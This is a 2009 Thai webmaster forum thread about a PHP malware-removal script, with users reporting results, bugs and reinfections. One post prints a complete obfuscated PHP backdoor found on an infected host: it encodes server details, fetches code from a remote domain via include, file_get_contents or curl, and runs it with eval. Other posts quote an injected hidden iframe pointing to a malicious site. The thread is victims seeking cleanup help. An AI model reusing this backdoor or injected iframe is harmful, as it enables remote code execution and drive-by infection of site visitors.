หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: sealinda ที่ 12 มิถุนายน 2009, 20:56:41

มาเก็บไปลอง
ขอบคุณมากๆๆค่ะ :-*

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: navico ที่ 12 มิถุนายน 2009, 21:18:44

ขอบคุณคราบ

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: baby-bride ที่ 13 มิถุนายน 2009, 06:52:00

ผมรันทุกวันเลย จนกว่าจะได้สักอาทิตย์

ขอบคุณ

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: tapo ที่ 13 มิถุนายน 2009, 07:26:55

สุดยอดเลยครับพี่ +1 สำหรับผลงานดีๆ ของพี่โจ้ นี่ถ้าทำขายยังได้เลยนะครับ แ่ต่คนหล่อๆส่วนมากจะใจดีแบบพี่โจ้นี่แหล่ะ :D ;D(สปอยเยอะไปไหมนี่ :P)

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: yoyokung ที่ 13 มิถุนายน 2009, 07:51:38

ชอบมากเลยครับ ขอบคุณมากๆเลย

ที่ตั้งใจนำมาให้ใช้ เป็นประโยชน์มากๆมายเลย

ทำให้หายเครียดด้วย อิอิ

ใช้งานง่ายมาก ทีแรกนึกว่าไฟล์จะใหญ่ ที่แท้มีสองไฟล์ เล้กๆ แต่ความสามารถเกินจริง

ขอบคุณครับขอบคุณ

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: EThaiZone ที่ 13 มิถุนายน 2009, 09:54:27

อย่าคิดว่าสคริปนี้ดีไปซะทีเดียวนะครับ
ยอมรับกันตรงๆ ว่ามันยังมีบั๊กบางจุดที่ทำให้ผมงงเหมือนกัน
เช่น บางคนทักมาว่า บรรทัดท้ายหาย (พวก ?> ) อันนี้ผมก็งง
เพราะ regex ไม่น่าจะลบส่วนนั้นทิ้ง

เลยเกิดสภาพเหมือนผีหลอก หาสาเหตุให้ไม่ได้
ไม่รู้ว่าจะทำไงดี เพราะหาจุดบกพร่องไม่เจอ

ยังไงดีที่สุดคือ แก้ด้วยมือครับ
ให้คนที่เขียน php เป็น ก็น่าจะแก้ได้หมด

ุถ้าใครคิดว่าเว็บสำคัญมากๆ กลัวเสียหาย ก็ลองส่งมาทาง PM ให้ผมดูก็ได้
แต่รับแก้ให้คนละครั้งนะครับ

:P

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: sealinda ที่ 13 มิถุนายน 2009, 10:43:40

อ้างจาก: EThaiZone ที่ 13 มิถุนายน 2009, 09:54:27

ตรงนี้เป็นไปได้หรือเปล่า ว่าพวก hacker เค้าเป็นคนลบออกไป ก่อนที่จะแทรก iframe
เพราะรอบนี้พี่เอเจอเค้าลบบางส่วนของโค้ดบรรทัดสุดท้ายออก
ก่อนจะแทรก iframe :P

สคริป vdo ของคุณ Tee++; เจอลบบรรทัดที่ 2 ออกไปทั้งบรรทัดเลย ก่อนจะแทรก iframe ในบรรทัดสุดท้าย
สคริปเอ๋อไปเลย :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: EThaiZone ที่ 13 มิถุนายน 2009, 10:47:57

อ้างจาก: sealinda ที่ 13 มิถุนายน 2009, 10:43:40

อ้างจาก: EThaiZone ที่ 13 มิถุนายน 2009, 09:54:27

อืม เป็นไปได้ครับ
ผมเคยเจอเคสหนึ่ง เว็บใหญ่โดนนะ แบบโดนแฮกแล้วประกาศศักดา
มันทำให้สคริป error แล้วแทรกโค้ดบนตัวแล้วแสดงผลผ่าน error แทนก็มี
คือคุมผ่าน error handling อีกที

สงสัยต้องการแสดงความเมพของตัวเอง :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: farasez ที่ 17 มิถุนายน 2009, 00:38:36

ผมรันไฟล์ไปแล้วเกิด error ขึ้นแบบนี้น่ะครับ แล้วขึ้นเต็มทั้งโฮสต์เลย เป็นไฟล์ตัวเลขประมาณ 5 ตัว .php ด้วย หลังจากรันไฟล์ลบไวรัสอันนี้นะครับ

อ้างถึง

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="466438d6f7a8339588557c955e796a29") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: EThaiZone ที่ 17 มิถุนายน 2009, 01:55:39

error จากสคริปผมเหรอครับ หรือยังไง
เพราะไม่คิดว่ามันจะคืนค่า error มาแบบนี้
(เวลา php error มันต้องมีมากกว่านี้)

ยังไงลองส่งเว็บมาให้ดูทาง Pm ดูครับ แล้วชี้จุดที่เกิด error มาด้วยครับ

แล้วผมลองแกะโค้ดดู ดูเหมือนเป็นโค้ดฝีมือแฮกเกอร์
เว็บ rssnews.ws

:P

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: farasez ที่ 17 มิถุนายน 2009, 07:02:23

อ้างจาก: EThaiZone ที่ 17 มิถุนายน 2009, 01:55:39

ผมก็ไม่รู้ว่าเกิดจากอะไร แต่มันจะมี error ที่บรรทัด 197 กะ 199 ถ้าเกิดจากแฮคเกอร์ แบบนี้จะพอแก้ปัญหาได้มั๊ยครับ

เพราะรันไฟล์ที ทั้งแต่บ่าย 2 ถึง 3 ทุ่มยังไม่เสร็จเลยครับ นานมากๆ เดี๋ยวตอนนี้กำลังรันไฟล์อีกรอบ

จะก๊อปหน้าที่เกิด error มาให้ดูก็แล้วกันนะครับ เพราะผมก็ไม่รู้เรื่องอะไรแนวนี้ :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: baby-bride ที่ 19 มิถุนายน 2009, 10:32:28

วันนี้โดนอีกรอบ

โค๊ด:

 src="http://bigtopleads.cn:8080/index.php" width=162 height=140 style="visibility: hidden"

ถามหน่อยครับว่า
หลังรันโปรแกรมแล้ว หากจะเข้าไปหา
โค๊ดไอเฟรม ใน database wordpress น่าจะใช้ เครื่องมืออะไร

และเริ่มหา ด้วยการใช้ คีย์เวิดอะไร

คือเหมือนเว็บนี้ มันเป็นแล้ว เป็นอีกไม่ยอมจบ
รันโปรแกรม ลงเวิดเพลสใหม่ ไปหลายทีแล้วไม่หาย

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: natterwoods ที่ 21 มิถุนายน 2009, 01:08:36

อ้างจาก: baby-bride ที่ 19 มิถุนายน 2009, 10:32:28

วันนี้โดนอีกรอบ

โค๊ด:

 src="[url]http://bigtopleads.cn:8080/index.php[/url]" width=162 height=140 style="visibility: hidden"

เป็นคล้ายๆ กันเลยอะ
เริ่มเป็นประมาณวันที่ 18 มิย. เนี้ย รอคำตอบด้วยคน

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: thaiga ที่ 02 กรกฎาคม 2009, 11:12:31

มันแสกนไม่ครับอะครับ
มันหยุดไปดื้อๆเลยครับ แก้ไงครับเนี่ยะ :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: klab ที่ 02 กรกฎาคม 2009, 20:15:10

ไม่รู้จะได้ผลไหมนะครับ มั่วอาว

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: i-rinver ที่ 02 กรกฎาคม 2009, 20:27:03

ขอบคุณครับ :)

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: klab ที่ 02 กรกฎาคม 2009, 22:20:32

อ้างถึง

Warning: include_once(/home/nongrawian/domains/nongrawiang.go.th/public_html/home/components/com_kunena/lib/kunena.debug.php) [function.include-once]: failed to open stream: No such file or directory in /home/nongrawian/domains/nongrawiang.go.th/public_html/home/modules/mod_kunenalatest/helper.php on line 9

Warning: include_once() [function.include]: Failed opening '/home/nongrawian/domains/nongrawiang.go.th/public_html/home/components/com_kunena/lib/kunena.debug.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/nongrawian/domains/nongrawiang.go.th/public_html/home/modules/mod_kunenalatest/helper.php on line 9

Warning: require_once(/home/nongrawian/domains/nongrawiang.go.th/public_html/home/components/com_kunena/lib/kunena.config.class.php) [function.require-once]: failed to open stream: No such file or directory in /home/nongrawian/domains/nongrawiang.go.th/public_html/home/modules/mod_kunenalatest/helper.php on line 10

Fatal error: require_once() [function.require]: Failed opening required '/home/nongrawian/domains/nongrawiang.go.th/public_html/home/components/com_kunena/lib/kunena.config.class.php' (include_path='.:/usr/local/lib/php') in /home/nongrawian/domains/nongrawiang.go.th/public_html/home/modules/mod_kunenalatest/helper.php on line 10

ซวยแล้วครับมันทำไมขึ้นแบบนี้อ่าคราบ

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: g-ji ที่ 02 กรกฎาคม 2009, 22:51:53

ไฟล์

components/com_kunena/lib/kunena.debug.php << นี้อ่ะ ตามพาท มันหาย

อัพขึ้นไปใหม่จิ

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: klab ที่ 02 กรกฎาคม 2009, 22:55:09

อ้างจาก: g-ji ที่ 02 กรกฎาคม 2009, 22:51:53

ไฟล์

components/com_kunena/lib/kunena.debug.php << นี้อ่ะ ตามพาท มันหาย

อัพขึ้นไปใหม่จิ

เชคราบ ขอบคุณครับ ผมอัพไปแล้วครับ เห่อๆยังไม่ได้มาอัพเดท แต่กำลังลองรันสคริป ครั้งที่ 2 ดูอ่าครับ เพราะยังไม่หายครับ เหอๆ

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: klab ที่ 02 กรกฎาคม 2009, 23:28:12

(http://images.temppic.com/02-07-2009/images_vertis/1246551971_0.44579500.jpg) (http://www.temppic.com/img.php?02-07-2009:1246551971_0.44579500.jpg)

(http://images.temppic.com/02-07-2009/images_vertis/1246552059_0.48137800.jpg) (http://www.temppic.com/img.php?02-07-2009:1246552059_0.48137800.jpg)

ผลงานนะตอนนี้ครับ เหอ่ๆ

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: EThaiZone ที่ 03 กรกฎาคม 2009, 03:46:51

พักนี้ไม่ว่างเลย :P

ใจจริงแนะนำแก้มือดีที่สุดครับ เพราะสคริปผมหลายครั้งมันมีอาการผีเข้าแบบหาสาเหตุไม่ได้
คือเทสบนเครื่องคิดว่าไม่มีปัญหา แต่พอใช้งานจริง บางคนเจอไวรัสซ้อนๆ
กลับเกิดอาการผีเข้า ทำงานพลาด

อ้างจาก: natterwoods ที่ 21 มิถุนายน 2009, 01:08:36

อ้างจาก: baby-bride ที่ 19 มิถุนายน 2009, 10:32:28

วันนี้โดนอีกรอบ

โค๊ด:

 src="[url]http://bigtopleads.cn:8080/index.php[/url]" width=162 height=140 style="visibility: hidden"

เป็นคล้ายๆ กันเลยอะ
เริ่มเป็นประมาณวันที่ 18 มิย. เนี้ย รอคำตอบด้วยคน

ก็ต้องหา <iframe แหละครับ แล้วค่อยไล่อีกทีว่าใช่ไม่ใช่
งานนี้ถ้าทำเองไม่ไหว ก็ต้องหาจ้างฟรีแลนท์มาแก้ล่ะครับ

:-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: alldata ที่ 04 กรกฎาคม 2009, 10:05:55

เปิดเว็บ แล้ว มันดึง ป๊อบอัพ เว็บ

hxxp://www.jshoppers.com/eg/cam_regist/index.html

และมีลิงค์อื่นๆ อีก 2-3 ลิงค์ ครับ

ลองเอา PHP Virus Remover AJAX v2.S By EThaiZone มาใช้ แสกนไปเสร็จ ลองมาแสกนใหม่ มันก็ยังโชวมาเพียบเลยครับ

แสกนแล้ว ขึ้นมาประมาณนี้ครับ แสกนเสร็จลองเข้าดูมันก็ยัง เด้งขึ้นมาอีก ลองแสกนใหม่ ก็ยังเจออยู่ครับ :-X

จะต้องแก้ไขยังไงดี ครับ

โค๊ด:

Run File Scanner & Fixer...
(1/18) Cleaned: /xxxxx.com/search.php... [Found!] (Found: 388)
(3/18) Cleaned: /xxxxx.com/fileinfo.php... [Found!] (Found: 896)
(4/18) Cleaned: /xxxxx.com/php_virus_remover_ajax_dreamhost_edition.php... [Found!] (Found: 175566)
(5/18) Cleaned: /xxxxx.com/config.php... [Found!] (Found: 5738)
(7/18) Cleaned: /xxxxx.com/index-tmp.php... [Found!] (Found: 3182)
(8/18) Cleaned: /xxxxx.com/swfobject.js... [Found!] (Found: 13762)
(9/18) Cleaned: /xxxxx.com/bot.php... [Found!] (Found: 5896)
(12/18) Cleaned: /xxxxx.com/index.php... [Found!] (Found: 3572)
(14/18) Cleaned: /xxxxx.com/function.php... [Found!] (Found: 4166)
(16/18) Cleaned: /xxxxx.com/statsm5o3.html... [Found!] (Found: 2)
(18/18) Cleaned: /xxxxx.com/stats.php... [Found!] (Found: 1326)

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: teacup ที่ 05 กรกฎาคม 2009, 16:36:08

ผมว่าดีนะครับ
จะใช้ดูว่าโดนตรงไหนแล้วเอาไฟล์ไปทับซะ

เพราะให้ remove ออกมันก็ยังเหลือ code บางตัวที่ตัดไม่หมดอยู่ดี

ขอบคุณเจ้าของมากนะครับที่ทำให้ใช้เป็นประโยชน์มากครับ

ตอนนี้ยึดเอกราชคืนหลังมันกินดิสคัส 6.1 ผมไปหลายเว็บ ถ้าจะทิ้งสมาชิกก็พันกว่าแล้ว ข้อมูลอีก

ถ้าไม่ได้ตัวนนี้ตามแก้ลำบากแน่ครับ ขอบคุณหลายๆ

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: EThaiZone ที่ 06 กรกฎาคม 2009, 18:56:51

อ้างจาก: alldata ที่ 04 กรกฎาคม 2009, 10:05:55

โค๊ด:

Run File Scanner & Fixer...
(1/18) Cleaned: /xxxxx.com/search.php... [Found!] (Found: 388)
(3/18) Cleaned: /xxxxx.com/fileinfo.php... [Found!] (Found: 896)
(4/18) Cleaned: /xxxxx.com/php_virus_remover_ajax_dreamhost_edition.php... [Found!] (Found: 175566)
(5/18) Cleaned: /xxxxx.com/config.php... [Found!] (Found: 5738)
(7/18) Cleaned: /xxxxx.com/index-tmp.php... [Found!] (Found: 3182)
(8/18) Cleaned: /xxxxx.com/swfobject.js... [Found!] (Found: 13762)
(9/18) Cleaned: /xxxxx.com/bot.php... [Found!] (Found: 5896)
(12/18) Cleaned: /xxxxx.com/index.php... [Found!] (Found: 3572)
(14/18) Cleaned: /xxxxx.com/function.php... [Found!] (Found: 4166)
(16/18) Cleaned: /xxxxx.com/statsm5o3.html... [Found!] (Found: 2)
(18/18) Cleaned: /xxxxx.com/stats.php... [Found!] (Found: 1326)

จ๊ากก แสดงว่าสคริปผมน่ามีปัญหาแล้วล่ะ ทำไมเจอหนักขนาดนี้ :-X

กลัวที่จะทำให้ใช้จริงๆ เพราะกลัวมันไปทำเว็บพังเนี่ยแหละ :'(

อ้างจาก: teacup ที่ 05 กรกฎาคม 2009, 16:36:08

อนาคตจะทำเป็น checker อย่างเดียวครับ

แล้วแก้มือเอาเอง จะได้ไม่อันตราย :P

หัวข้อ: Re: [ไม่ทำต่อแล้ว] PHP Virus Remover AJAX v2.S By EThaiZone
เริ่มหัวข้อโดย: itum ที่ 20 สิงหาคม 2009, 19:02:02

พี่ครับสคริปยังใช้ได้อยู่ไม่ครับ

หรือว่ามีตัวอื่นที่ดักจับพวกจาวาสคริปก็ได้นะครับ

php ลบออกหมดแล้วแต่ไม่หายครับ

ลองเอาสรคิปนี้ไปรันมันก้อไม่แสดงอะไรออกมาเลยครับบอกแต่ว่า

Run File Extension Checker...

FEC: Success!!! (Total File: )

--------------------------------------------------------------------------------
Run File Scanner & Fixer...

FSF: Success!!!

แค่นี้อะครับ

หัวข้อ: Re: [ไม่ทำต่อแล้ว] PHP Virus Remover AJAX v2.S By EThaiZone
เริ่มหัวข้อโดย: pula ที่ 27 สิงหาคม 2009, 13:21:41

ผมได้โหลดสคริปไปรันบนเว็บผมครับหลังจากที๋โดนเล่นงานและปวดหัวนอนไม่หลับหลายวัน

มารายงานความคืบหน้าหลังจากแสกนแล้วครับ
=================================
แล้วส่งคำขอไปยังกูเกิลอีกครั้งมีผลดังนี้ครับ....

คำขอให้พิจารณาใหม่สำหรับ http://www.rakayang.net/ 26 สิงหาคม 2552

เราได้รับคำขอจากเจ้าของเว็บไซต์ให้พิจารณาวิธีการที่เราจัดทำดัชนีเว็บไซต์ต่อไปนี้อีกครั้ง: http://www.rakayang.net/

เราจะตรวจสอบเว็บไซต์ หากเราพบว่าเว็บไซต์นั้นไม่มีการละเมิด หลักเกณฑ์สำหรับเว็บมาสเตอร์ ของเราอีกต่อไป เราจะพิจารณาการจัดทำดัชนีเว็บไซต์นั้นอีกครั้ง โปรดรอเป็นเวลาหลายสัปดาห์สำหรับคำขอให้พิจารณาใหม่ เราจะตรวจสอบคำขอทั้งหมด แต่ขออภัยที่เราไม่สามารถตอบทีละคำขอได้

=================================
หมายความว่าโอเคแล้วใช่ไหมครับ

ขอเสียงคนเคยโดนหน่อยครับ :'(

หัวข้อ: Re: [ไม่ทำต่อแล้ว] PHP Virus Remover AJAX v2.S By EThaiZone
เริ่มหัวข้อโดย: ems ที่ 27 สิงหาคม 2009, 13:50:25

ไม่มีทางแก้หมดหรอกครับ มันเยอะจัด เดียวก็มันก็เปลี่ยนวิธีใหม่เรื่อยๆ

แก้ที่ต้นเหตุดีกว่า
1. เปลี่ยนรหัส FTP
2. แยกเครื่องที่จะ FTP ออกจากเครื่องที่เล่นจริงๆ ถ้าแยกไม่ได้ให้ใช้ vmware
3. Scan virus ที่เครื่องเราด้วย

SMF 1.1.21 | Simple Machines | ThaiSEOBoard.com